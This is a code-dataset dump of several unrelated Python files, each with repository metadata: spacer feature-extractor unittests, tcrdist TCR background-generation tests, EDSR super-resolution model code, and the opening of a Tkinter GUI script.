09ec5d41aa3d239e252e351b18a0835956c21903
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
from PIL import Image
from spacer import config
from spacer.data_classes import ImageFeatures
from spacer.extract_features import feature_extractor_factory
from spacer.messages import \
ExtractFeaturesMsg, \
ExtractFeaturesReturnMsg, \
DataLocation
from spacer.storage import load_image
class TestDummyExtractor(unittest.TestCase):
    """Tests for the 'dummy' extractor produced by the factory."""

    def test_simple(self):
        """A single (row, col) point yields features with that metadata."""
        msg = ExtractFeaturesMsg(
            job_token='job_nbr_1',
            feature_extractor_name='dummy',
            rowcols=[(100, 100)],
            image_loc=DataLocation(storage_type='memory', key='not_used'),
            feature_loc=DataLocation(storage_type='memory', key='not_used'))
        extractor = feature_extractor_factory(
            msg.feature_extractor_name, dummy_featuredim=4096)
        features, return_msg = extractor(
            Image.new('RGB', (100, 100)), msg.rowcols)
        self.assertIsInstance(return_msg, ExtractFeaturesReturnMsg)
        self.assertIsInstance(features, ImageFeatures)
        # Point metadata mirrors the requested row/col pair.
        self.assertEqual(features.point_features[0].row, 100)
        self.assertEqual(features.point_features[0].col, 100)

    def test_dims(self):
        """The factory forwards dummy_featuredim to the extractor."""
        requested_dim = 42
        extractor = feature_extractor_factory(
            'dummy', dummy_featuredim=requested_dim)
        self.assertEqual(extractor.feature_dim, requested_dim)

    def test_duplicate_rowcols(self):
        """Duplicate points still produce one feature per requested point."""
        msg = ExtractFeaturesMsg(
            job_token='job_nbr_1',
            feature_extractor_name='dummy',
            rowcols=[(100, 100), (100, 100), (50, 50)],
            image_loc=DataLocation(storage_type='memory', key='not_used'),
            feature_loc=DataLocation(storage_type='memory', key='not_used'))
        extractor = feature_extractor_factory(
            msg.feature_extractor_name, dummy_featuredim=4096)
        features, _ = extractor(Image.new('RGB', (100, 100)), msg.rowcols)
        self.assertEqual(len(features.point_features), len(msg.rowcols))
@unittest.skipUnless(config.HAS_CAFFE, 'Caffe not installed')
@unittest.skipUnless(config.HAS_S3_MODEL_ACCESS, 'No access to models')
@unittest.skipUnless(config.HAS_S3_TEST_ACCESS, 'No access to test bucket')
class TestCaffeExtractor(unittest.TestCase):
"""Integration tests for the Caffe 'vgg16_coralnet_ver1' extractor.

Skipped unless Caffe is installed and both the S3 model and test
buckets are reachable (see the skipUnless decorators above).
"""
def setUp(self):
# Apply the project's warning filters before each test.
config.filter_warnings()
def test_simple(self):
"""Extract features for one point of an S3-hosted image."""
msg = ExtractFeaturesMsg(
job_token='simple_job',
feature_extractor_name='vgg16_coralnet_ver1',
rowcols=[(100, 100)],
image_loc=DataLocation(storage_type='s3',
key='edinburgh3.jpg',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features, return_msg = ext(img, msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata: row/col echo the requested point.
self.assertEqual(features.point_features[0].row, 100)
self.assertEqual(features.point_features[0].col, 100)
def test_dims(self):
"""The VGG16 extractor reports a 4096-dimensional feature vector."""
ext = feature_extractor_factory('vgg16_coralnet_ver1')
self.assertEqual(ext.feature_dim, 4096)
def test_corner_case1(self):
"""
This particular image caused trouble on the production server.
The image file itself is lightly corrupted, and PIL doesn't like it.
"""
msg = ExtractFeaturesMsg(
job_token='cornercase_1',
feature_extractor_name='vgg16_coralnet_ver1',
rowcols=[(148, 50), (60, 425)],
image_loc=DataLocation(storage_type='s3',
key='kh6dydiix0.jpeg',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features, return_msg = ext(img, msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata
self.assertEqual(features.point_features[0].row, 148)
self.assertEqual(features.point_features[0].col, 50)
# NOTE(review): named 'test_cornercase2' while its sibling above is
# 'test_corner_case1' -- inconsistent, but renaming is out of scope here.
def test_cornercase2(self):
"""
This particular image caused trouble on the production server.
The image file itself is lightly corrupted, and PIL doesn't
quite like it.
"""
msg = ExtractFeaturesMsg(
job_token='cornercase_2',
feature_extractor_name='vgg16_coralnet_ver1',
rowcols=[(190, 226), (25, 359)],
image_loc=DataLocation(storage_type='s3',
key='sfq2mr5qbs.jpeg',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features, return_msg = ext(img, msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata
self.assertEqual(features.point_features[0].row, 190)
self.assertEqual(features.point_features[0].col, 226)
def test_regression(self):
"""
This tests run the extractor on a known image and compares the
results to the features extracted with the
https://github.com/beijbom/ecs_spacer/releases/tag/1.0
"""
rowcols = [(20, 265),
(76, 295),
(59, 274),
(151, 62),
(265, 234)]
msg = ExtractFeaturesMsg(
job_token='regression_job',
feature_extractor_name='vgg16_coralnet_ver1',
rowcols=rowcols,
image_loc=DataLocation(storage_type='s3',
key='08bfc10v7t.png',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
# Reference features produced by the legacy 1.0 extractor release.
legacy_feat_loc = DataLocation(storage_type='s3',
key='08bfc10v7t.png.featurevector',
bucket_name=config.TEST_BUCKET)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features_new, _ = ext(img, msg.rowcols)
features_legacy = ImageFeatures.load(legacy_feat_loc)
# New features must numerically match the legacy ones; only the new
# pipeline carries row/col metadata (legacy rows are None).
for pf_new, pf_legacy in zip(features_new.point_features,
features_legacy.point_features):
self.assertTrue(np.allclose(pf_legacy.data, pf_new.data,
atol=1e-5))
self.assertTrue(pf_legacy.row is None)
self.assertTrue(pf_new.row is not None)
@unittest.skipUnless(config.HAS_S3_MODEL_ACCESS, 'No access to models')
@unittest.skipUnless(config.HAS_S3_TEST_ACCESS, 'No access to test bucket')
class TestEfficientNetExtractor(unittest.TestCase):
"""Integration tests for the 'efficientnet_b0_ver1' extractor.

Skipped unless both the S3 model and test buckets are reachable.
"""
def setUp(self):
# Apply the project's warning filters before each test.
config.filter_warnings()
def test_simple(self):
"""Extract features for one point; EfficientNet-B0 is 1280-dim."""
msg = ExtractFeaturesMsg(
job_token='simple_job',
feature_extractor_name='efficientnet_b0_ver1',
rowcols=[(100, 100)],
image_loc=DataLocation(storage_type='s3',
key='edinburgh3.jpg',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features, return_msg = ext(img, msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata and the 1280-dim feature length.
self.assertEqual(features.point_features[0].row, 100)
self.assertEqual(features.point_features[0].col, 100)
self.assertEqual(len(features.point_features[0].data), 1280)
self.assertEqual(features.feature_dim, 1280)
def test_dims(self):
"""The extractor reports the EfficientNet-B0 feature dimension."""
ext = feature_extractor_factory('efficientnet_b0_ver1')
self.assertEqual(ext.feature_dim, 1280)
def test_corner_case1(self):
"""Same lightly-corrupted image as the Caffe corner case 1."""
msg = ExtractFeaturesMsg(
job_token='cornercase_1',
feature_extractor_name='efficientnet_b0_ver1',
rowcols=[(148, 50), (60, 425)],
image_loc=DataLocation(storage_type='s3',
key='kh6dydiix0.jpeg',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features, return_msg = ext(img, msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata
self.assertEqual(features.point_features[0].row, 148)
self.assertEqual(features.point_features[0].col, 50)
self.assertEqual(len(features.point_features[0].data), 1280)
def test_corner_case2(self):
"""Same lightly-corrupted image as the Caffe corner case 2."""
msg = ExtractFeaturesMsg(
job_token='cornercase_2',
feature_extractor_name='efficientnet_b0_ver1',
rowcols=[(190, 226), (25, 359)],
image_loc=DataLocation(storage_type='s3',
key='sfq2mr5qbs.jpeg',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features, return_msg = ext(img, msg.rowcols)
self.assertTrue(isinstance(return_msg, ExtractFeaturesReturnMsg))
self.assertTrue(isinstance(features, ImageFeatures))
# Check some feature metadata
self.assertEqual(features.point_features[0].row, 190)
self.assertEqual(features.point_features[0].col, 226)
self.assertEqual(len(features.point_features[0].data), 1280)
def test_regression(self):
"""Compare against pre-extracted legacy features stored on S3."""
rowcols = [(20, 265),
(76, 295),
(59, 274),
(151, 62),
(265, 234)]
msg = ExtractFeaturesMsg(
job_token='regression_job',
feature_extractor_name='efficientnet_b0_ver1',
rowcols=rowcols,
image_loc=DataLocation(storage_type='s3',
key='08bfc10v7t.png',
bucket_name=config.TEST_BUCKET),
feature_loc=DataLocation(storage_type='memory',
key='dummy')
)
# Reference features produced by an earlier extractor version.
legacy_feat_loc = DataLocation(storage_type='s3',
key='08bfc10v7t.png.effnet.'
'ver1.featurevector',
bucket_name=config.TEST_BUCKET)
ext = feature_extractor_factory(msg.feature_extractor_name)
img = load_image(msg.image_loc)
features_new, _ = ext(img, msg.rowcols)
features_legacy = ImageFeatures.load(legacy_feat_loc)
# Legacy features carry no row/col info; the new ones do.
self.assertFalse(features_legacy.valid_rowcol)
self.assertEqual(features_legacy.npoints, len(rowcols))
self.assertEqual(features_legacy.feature_dim, 1280)
self.assertTrue(features_new.valid_rowcol)
self.assertEqual(features_new.npoints, len(rowcols))
self.assertEqual(features_new.feature_dim, 1280)
# Feature values must match the legacy extraction numerically.
for pf_new, pf_legacy in zip(features_new.point_features,
features_legacy.point_features):
self.assertTrue(np.allclose(pf_legacy.data, pf_new.data,
atol=1e-5))
self.assertTrue(pf_legacy.row is None)
self.assertTrue(pf_new.row is not None)
# Allow running this test module directly with the interpreter.
if __name__ == '__main__':
unittest.main()
| 38.770833
| 77
| 0.595763
| 1,334
| 13,027
| 5.575712
| 0.130435
| 0.073138
| 0.065071
| 0.076902
| 0.877252
| 0.857085
| 0.831944
| 0.823071
| 0.805055
| 0.766335
| 0
| 0.036272
| 0.312198
| 13,027
| 335
| 78
| 38.886567
| 0.793862
| 0.048131
| 0
| 0.795082
| 0
| 0
| 0.064393
| 0.00407
| 0
| 0
| 0
| 0
| 0.196721
| 1
| 0.061475
| false
| 0
| 0.032787
| 0
| 0.106557
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4b03832cb70a8de964c330330e59fdcad1e38c7b
| 48
|
py
|
Python
|
alfalfa/action_imports.py
|
electronhead/alfalfa
|
6098a87c88b0ae6aff8c8f6d41b924d293500e62
|
[
"MIT"
] | null | null | null |
alfalfa/action_imports.py
|
electronhead/alfalfa
|
6098a87c88b0ae6aff8c8f6d41b924d293500e62
|
[
"MIT"
] | null | null | null |
alfalfa/action_imports.py
|
electronhead/alfalfa
|
6098a87c88b0ae6aff8c8f6d41b924d293500e62
|
[
"MIT"
] | null | null | null |
import alfalfa.gpio_action
import alfalfa.action
| 24
| 26
| 0.895833
| 7
| 48
| 6
| 0.571429
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 48
| 2
| 27
| 24
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d9a5f32f9db567a73eedc39029e486674c6fb46d
| 6,087
|
py
|
Python
|
tcrdist/tests/test_background.py
|
agartland/tcrdist3
|
34f8d50e7448b2bf7cf7cd9ab9a2d80759f47240
|
[
"MIT"
] | 26
|
2020-12-28T17:37:01.000Z
|
2022-01-29T01:31:13.000Z
|
tcrdist/tests/test_background.py
|
agartland/tcrdist3
|
34f8d50e7448b2bf7cf7cd9ab9a2d80759f47240
|
[
"MIT"
] | 31
|
2020-08-17T22:17:57.000Z
|
2022-03-18T23:47:34.000Z
|
tcrdist/tests/test_background.py
|
agartland/tcrdist3
|
34f8d50e7448b2bf7cf7cd9ab9a2d80759f47240
|
[
"MIT"
] | 7
|
2020-08-18T23:55:40.000Z
|
2021-09-22T18:15:54.000Z
|
"""
This is an integration test of the major features in background.py
"""
import os
import pytest
__all__ = ['test_background_generation_in_mira_60']
def test_background_generation_toy_example():
"""Build a 200K-row background (VJ-matched + stratified random) for a
toy 25-TCR target repertoire and check its size and gene-usage match."""
import sys
import os
import numpy as np
import pandas as pd
from tcrsampler.sampler import TCRsampler
from tcrdist.background import make_gene_usage_counter, get_gene_frequencies, calculate_adjustment, make_gene_usage_counter
from tcrdist.background import make_vj_matched_background, make_flat_vj_background
from tcrdist.background import get_stratified_gene_usage_frequency
from tcrdist.background import sample_britanova
"""
SUPPOSE WE HAVE SOME REPERTOIRE WITH THE FOLLOWING GENE USAGE SPECIFIED BY ix
< df_target > For testing we will use a set of 25 TCRs generated from rare and semi-rare V,J pairings. We use 25 only
because we will be comuting distances against 4.6 Million seqs.
1. TCRsampler, replacing gene occurance frequencies with subject tratified estimates
NOTE: with replace = True .vj_occur_freq will now be the stratified value
2. Make V,J gene usage matched backgound to match usage in df_target
3. Use a subject-stratifeid random draw from the Britanova Chord Blood Samples
4. Make V,J gene usage matched backgound to match usage in df_target
"""
ts = TCRsampler(default_background = 'britanova_human_beta_t_cb.tsv.sampler.tsv') # 1
ts = get_stratified_gene_usage_frequency(ts = ts, replace = True)
# Each entry is [v_b_gene, j_b_gene, count] for the toy target repertoire.
ix =[['TRBV19*01', 'TRBJ2-5*01', 3],['TRBV24-1*01', 'TRBJ2-4*01', 3],['TRBV25-1*01', 'TRBJ2-4*01', 3],['TRBV30*01', 'TRBJ2-3*01', 2],['TRBV5-4*01', 'TRBJ2-3*01', 2],['TRBV11-2*01', 'TRBJ2-2*01', 2],['TRBV2*01', 'TRBJ1-5*01', 1],['TRBV12-5*01', 'TRBJ2-7*01', 1],['TRBV4-1*01', 'TRBJ1-6*01', 1],['TRBV6-5*01', 'TRBJ1-6*01', 1],['TRBV13*01', 'TRBJ2-3*01', 1],['TRBV18*01', 'TRBJ2-3*01', 1],['TRBV14*01', 'TRBJ2-7*01', 1],['TRBV6-6*01', 'TRBJ2-7*01', 1],['TRBV10-3*01', 'TRBJ2-3*01', 1],['TRBV7-2*01', 'TRBJ2-1*01', 1],['TRBV5-1*01', 'TRBJ2-1*01', 1]]
flatten = lambda l: [item for sublist in l for item in sublist]
# Sample CDR3s for each V,J pair and assemble the target DataFrame.
df_target = pd.concat([pd.DataFrame({'cdr3_b_aa' : flatten(ts.sample([[x[0], x[1], x[2]]])) , 'v_b_gene':x[0], 'j_b_gene':x[1]}) for x in ix]).reset_index(drop = True)
gene_usage_counter = make_gene_usage_counter(df_target) # 2
df_vj_bkgd = make_vj_matched_background(ts = ts,
gene_usage_counter = gene_usage_counter,
size = 101000, # Ask for a few extra as Olga can return none if it makes too many non-productive CDR3s
recomb_type="VDJ",
chain_folder = "human_T_beta",
cols = ['v_b_gene', 'j_b_gene', 'cdr3_b_aa'])
df_vj_bkgd = df_vj_bkgd.sample(100000).reset_index(drop = True)
df_vj_bkgd['weights'] = calculate_adjustment(df = df_vj_bkgd, adjcol = "pVJ")
df_vj_bkgd['source'] = "vj_matched"
df_britanova_100K = sample_britanova(size = 100000) # 3
df_britanova_100K = get_gene_frequencies(ts = ts, df = df_britanova_100K)
df_britanova_100K['weights'] = 1
df_britanova_100K['source'] = "stratified_random"
df_bkgd = pd.concat([df_vj_bkgd, df_britanova_100K], axis = 0).\
reset_index(drop = True) # 4
# 100K VJ-matched + 100K stratified random rows.
assert df_bkgd.shape[0] == 200000
"""
Visually inspect the gene_usage between target seqs and vj-matched background
"""
df_check_match = pd.concat([df_vj_bkgd.groupby(['v_b_gene', 'j_b_gene']).size()/df_vj_bkgd.shape[0], df_target.groupby(['v_b_gene', 'j_b_gene']).size()/df_target.shape[0]], axis = 1)
assert np.all(abs(df_check_match[0] - df_check_match[1]) < 0.001)
return df_bkgd
@pytest.mark.skip(reason="This test documents an example, but is redundant. Skipped in the interest of CI time.")
def test_background_generation_in_mira_60(fn = os.path.join('tcrdist','data','covid19','mira_epitope_60_436_MWSFNPETNI_SFNPETNIL_SMWSFNPET.tcrdist3.csv')):
"""Build the same 200K-row background as the toy example, but for a real
MIRA epitope-60 target repertoire loaded from the packaged CSV."""
import sys
import os
import numpy as np
import pandas as pd
from tcrsampler.sampler import TCRsampler
from tcrdist.background import make_gene_usage_counter, get_gene_frequencies, calculate_adjustment, make_gene_usage_counter
from tcrdist.background import make_vj_matched_background, make_flat_vj_background
from tcrdist.background import get_stratified_gene_usage_frequency
from tcrdist.background import sample_britanova
"""
SUPPOSE WE HAVE SOME REPERTOIRE WITH THE FOLLOWING GENE USAGE SPECIFIED BY ix
< df_target > For testing we will use a set of 25 TCRs generated from rare and semi-rare V,J pairings. We use 25 only
because we will be comuting distances against 4.6 Million seqs.
1. TCRsampler, replacing gene occurance frequencies with subject tratified estimates
NOTE: with replace = True .vj_occur_freq will now be the stratified value
2. Make V,J gene usage matched backgound to match usage in df_target
3. Use a subject-stratifeid random draw from the Britanova Chord Blood Samples
4. Make V,J gene usage matched backgound to match usage in df_target
"""
ts = TCRsampler(default_background = 'britanova_human_beta_t_cb.tsv.sampler.tsv') # 1
ts = get_stratified_gene_usage_frequency(ts = ts, replace = True)
# The target repertoire comes from the MIRA CSV rather than a toy list.
df_target = pd.read_csv(fn)
df_target = df_target[['v_b_gene','j_b_gene','cdr3_b_aa']]
gene_usage_counter = make_gene_usage_counter(df_target) # 2
df_vj_bkgd = make_vj_matched_background(ts = ts,
gene_usage_counter = gene_usage_counter,
size = 150000, # Ask for a few extra as Olga can return none if it makes too many non-productive CDR3s
recomb_type="VDJ",
chain_folder = "human_T_beta",
cols = ['v_b_gene', 'j_b_gene', 'cdr3_b_aa'])
df_vj_bkgd = df_vj_bkgd.sample(100000).reset_index(drop = True)
df_vj_bkgd['weights'] = calculate_adjustment(df = df_vj_bkgd, adjcol = "pVJ")
df_vj_bkgd['source'] = "vj_matched"
df_britanova_100K = sample_britanova(size = 100000) # 3
df_britanova_100K = get_gene_frequencies(ts = ts, df = df_britanova_100K)
df_britanova_100K['weights'] = 1
df_britanova_100K['source'] = "stratified_random"
df_bkgd = pd.concat([df_vj_bkgd, df_britanova_100K], axis = 0).\
reset_index(drop = True) # 4
# 100K VJ-matched + 100K stratified random rows.
assert df_bkgd.shape[0] == 200000
#df_bkgd.
return df_bkgd
| 52.930435
| 548
| 0.744373
| 1,011
| 6,087
| 4.232443
| 0.212661
| 0.048376
| 0.029914
| 0.050479
| 0.810703
| 0.776116
| 0.75555
| 0.75555
| 0.75555
| 0.739425
| 0
| 0.058666
| 0.140299
| 6,087
| 114
| 549
| 53.394737
| 0.759029
| 0.043535
| 0
| 0.802817
| 0
| 0
| 0.203956
| 0.041382
| 0
| 0
| 0
| 0
| 0.042254
| 1
| 0.028169
| false
| 0
| 0.28169
| 0
| 0.338028
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9a7ac27437bc2175c0682b8f27a933309998062
| 6,118
|
py
|
Python
|
EDSR/edsr.py
|
NateLol/BAM_A_lightweight_but_efficient_Balanced_attention_mechanism_for_super_resolution
|
f23c043c6cd5c064e58b6b11bd7100fc55224702
|
[
"MIT"
] | 33
|
2021-04-30T02:40:05.000Z
|
2022-03-09T09:35:49.000Z
|
EDSR/edsr.py
|
chisyliu/BAM_A_lightweight_but_efficient_Balanced_attention_mechanism_for_super_resolution
|
4c977ea1586e7836248acb5cbd648e124b43aca3
|
[
"MIT"
] | 6
|
2021-05-10T23:19:35.000Z
|
2021-12-13T02:13:16.000Z
|
EDSR/edsr.py
|
chisyliu/BAM_A_lightweight_but_efficient_Balanced_attention_mechanism_for_super_resolution
|
4c977ea1586e7836248acb5cbd648e124b43aca3
|
[
"MIT"
] | 13
|
2021-05-18T12:21:48.000Z
|
2022-01-21T07:17:19.000Z
|
import EDSR.common as common
import torch.nn as nn
from Blanced_attention import BlancedAttention
# Download URLs for pre-trained EDSR weights, keyed by
# 'r{n_resblocks}f{n_feats}x{scale}' (the key is built the same way in the
# models' __init__ methods below).
url = {
'r16f64x2': 'https://cv.snu.ac.kr/research/EDSR/models/edsr_baseline_x2-1bc95232.pt',
'r16f64x3': 'https://cv.snu.ac.kr/research/EDSR/models/edsr_baseline_x3-abf2a44e.pt',
'r16f64x4': 'https://cv.snu.ac.kr/research/EDSR/models/edsr_baseline_x4-6b446fab.pt',
'r32f256x2': 'https://cv.snu.ac.kr/research/EDSR/models/edsr_x2-0edfb8a3.pt',
'r32f256x3': 'https://cv.snu.ac.kr/research/EDSR/models/edsr_x3-ea3ef2c6.pt',
'r32f256x4': 'https://cv.snu.ac.kr/research/EDSR/models/edsr_x4-4f62e9ef.pt'
}
def default_conv(in_channels, out_channels, kernel_size, bias=True):
    """Build a 2-D convolution whose padding preserves spatial size for
    odd kernel sizes (padding = kernel_size // 2)."""
    pad = kernel_size // 2
    return nn.Conv2d(in_channels, out_channels, kernel_size,
                     padding=pad, bias=bias)
# def make_model(args, parent=False):
# if args.dilation:
# from model import dilated
# return EDSR(args, dilated.dilated_conv)
# else:
# return EDSR(args)
class EDSR_blanced_attention(nn.Module):
"""EDSR super-resolution network with a BlancedAttention block applied
to the residual body output (otherwise identical structure to EDSR)."""
def __init__(self, args, conv=default_conv):
super(EDSR_blanced_attention, self).__init__()
n_resblocks = args.n_resblocks_edsr # 16
n_feats = args.n_feats_edsr # 64
kernel_size = 3
scale = args.scale # 4
act = nn.ReLU(True)
self.url = url['r{}f{}x{}'.format(n_resblocks, n_feats, scale)]
self.sub_mean = common.MeanShift(args.rgb_range) # normalize input (mean shift)
self.add_mean = common.MeanShift(args.rgb_range, sign=1) # restore output mean
# define head module
m_head = [conv(args.n_colors, n_feats, kernel_size)] # channels:3->64
# define body module
m_body = [ # n_resblocks ResBlocks (16 by default)
common.ResBlock( # params: 64, 3, relu, 1
conv, n_feats, kernel_size, act=act, res_scale=args.res_scale
) for _ in range(n_resblocks)
]
m_body.append(conv(n_feats, n_feats, kernel_size)) # channels:64->64
# define tail module
m_tail = [
common.Upsampler(conv, scale, n_feats, act=False), # all upsampling happens here
conv(n_feats, args.n_colors, kernel_size)
]
self.head = nn.Sequential(*m_head)
self.body = nn.Sequential(*m_body)
self.tail = nn.Sequential(*m_tail)
self.attention=BlancedAttention(n_feats)
def forward(self, x):
# NOTE(review): mean-shift normalization is disabled here although
# sub_mean/add_mean are still built in __init__ -- confirm intentional.
# x = self.sub_mean(x)
x = self.head(x)
res = self.body(x)
# Attention is applied to the body output before the skip connection.
res=self.attention(res)
res += x
x = self.tail(res)
# x = self.add_mean(x)
return x
def load_state_dict(self, state_dict, strict=True):
"""Copy parameters from state_dict, tolerating size mismatches and
missing keys in the 'tail' (the scale-dependent upsampler) only."""
own_state = self.state_dict()
for name, param in state_dict.items():
if name in own_state:
if isinstance(param, nn.Parameter):
param = param.data
try:
own_state[name].copy_(param)
except Exception:
# Only tail parameters may legitimately differ in size.
if name.find('tail') == -1:
raise RuntimeError('While copying the parameter named {}, '
'whose dimensions in the model are {} and '
'whose dimensions in the checkpoint are {}.'
.format(name, own_state[name].size(), param.size()))
elif strict:
if name.find('tail') == -1:
raise KeyError('unexpected key "{}" in state_dict'
.format(name))
class EDSR(nn.Module):
"""Baseline EDSR super-resolution network (head -> residual body ->
upsampling tail), without the attention block of the variant above."""
def __init__(self, args, conv=common.default_conv):
super(EDSR, self).__init__()
n_resblocks = args.n_resblocks # 16
n_feats = args.n_feats # 64
kernel_size = 3
scale = args.scale # 4
act = nn.ReLU(True)
self.url = url['r{}f{}x{}'.format(n_resblocks, n_feats, scale)]
self.sub_mean = common.MeanShift(args.rgb_range) # normalize input (mean shift)
self.add_mean = common.MeanShift(args.rgb_range, sign=1) # restore output mean
# define head module
m_head = [conv(args.n_colors, n_feats, kernel_size)] # channels:3->64
# define body module
m_body = [ # n_resblocks ResBlocks (16 by default)
common.ResBlock( # params: 64, 3, relu, 1
conv, n_feats, kernel_size, act=act, res_scale=args.res_scale
) for _ in range(n_resblocks)
]
m_body.append(conv(n_feats, n_feats, kernel_size)) # channels:64->64
# define tail module
m_tail = [
common.Upsampler(conv, scale, n_feats, act=False), # all upsampling happens here
conv(n_feats, args.n_colors, kernel_size)
]
self.head = nn.Sequential(*m_head)
self.body = nn.Sequential(*m_body)
self.tail = nn.Sequential(*m_tail)
def forward(self, x):
# NOTE(review): mean-shift normalization is disabled here although
# sub_mean/add_mean are still built in __init__ -- confirm intentional.
# x = self.sub_mean(x)
x = self.head(x)
res = self.body(x)
res += x
x = self.tail(res)
# x = self.add_mean(x)
return x
def load_state_dict(self, state_dict, strict=True):
"""Copy parameters from state_dict, tolerating size mismatches and
missing keys in the 'tail' (the scale-dependent upsampler) only."""
own_state = self.state_dict()
for name, param in state_dict.items():
if name in own_state:
if isinstance(param, nn.Parameter):
param = param.data
try:
own_state[name].copy_(param)
except Exception:
# Only tail parameters may legitimately differ in size.
if name.find('tail') == -1:
raise RuntimeError('While copying the parameter named {}, '
'whose dimensions in the model are {} and '
'whose dimensions in the checkpoint are {}.'
.format(name, own_state[name].size(), param.size()))
elif strict:
if name.find('tail') == -1:
raise KeyError('unexpected key "{}" in state_dict'
.format(name))
| 37.765432
| 96
| 0.539229
| 742
| 6,118
| 4.25876
| 0.180593
| 0.036076
| 0.018987
| 0.022785
| 0.82943
| 0.82943
| 0.798418
| 0.761076
| 0.761076
| 0.726899
| 0
| 0.027081
| 0.348153
| 6,118
| 161
| 97
| 38
| 0.765296
| 0.090389
| 0
| 0.730435
| 0
| 0.052174
| 0.14656
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06087
| false
| 0
| 0.026087
| 0.008696
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9b16fe5d7103844f306cd89f3809c253a75dea3
| 7,596
|
py
|
Python
|
ConvertMM.py
|
JonRob812/GimmeInches
|
51652d1e49a99455619ad3d82e24a7085cc55dfd
|
[
"Apache-2.0"
] | null | null | null |
ConvertMM.py
|
JonRob812/GimmeInches
|
51652d1e49a99455619ad3d82e24a7085cc55dfd
|
[
"Apache-2.0"
] | null | null | null |
ConvertMM.py
|
JonRob812/GimmeInches
|
51652d1e49a99455619ad3d82e24a7085cc55dfd
|
[
"Apache-2.0"
] | null | null | null |
# NOTE(review): a stray merge-conflict marker ("<<<<<<< HEAD") stood here with
# no matching "=======" / ">>>>>>>" in view -- confirm the merge was resolved.
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# GUI module generated by PAGE version 4.26
# in conjunction with Tcl version 8.6
# Dec 30, 2019 03:32:14 PM PST platform: Windows NT
import sys
import os
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
import ConvertMM_support
def vp_start_gui():
    """Create the Tk root, build the main window, and enter the event loop."""
    global val, w, root
    root = tk.Tk()
    ConvertMM_support.set_Tk_var()
    ConvertMM_support.init(root, Toplevel1(root))
    root.mainloop()
def destroy_Toplevel1():
    """Tear down the application window and clear the module-level handle."""
    global w
    w.destroy()
    w = None
def resource_path(relative_path):
    """Resolve *relative_path* against the application base directory.

    Works both in development (relative to the current directory) and when
    frozen by PyInstaller, which unpacks resources into the temporary folder
    recorded in ``sys._MEIPASS``.
    """
    base = getattr(sys, '_MEIPASS', None)
    if base is None:
        base = os.path.abspath(".")
    return os.path.join(base, relative_path)
class Toplevel1:
    def __init__(self, top=None):
        '''This class configures and populates the toplevel window.
        top is the toplevel containing window.'''
        # PAGE-generated palette constants; most are unused below and kept
        # only for reference.
        _bgcolor = '#000000'  # X11 color: 'black'
        _fgcolor = '#838383'  # Closest X11 color: 'gray51'
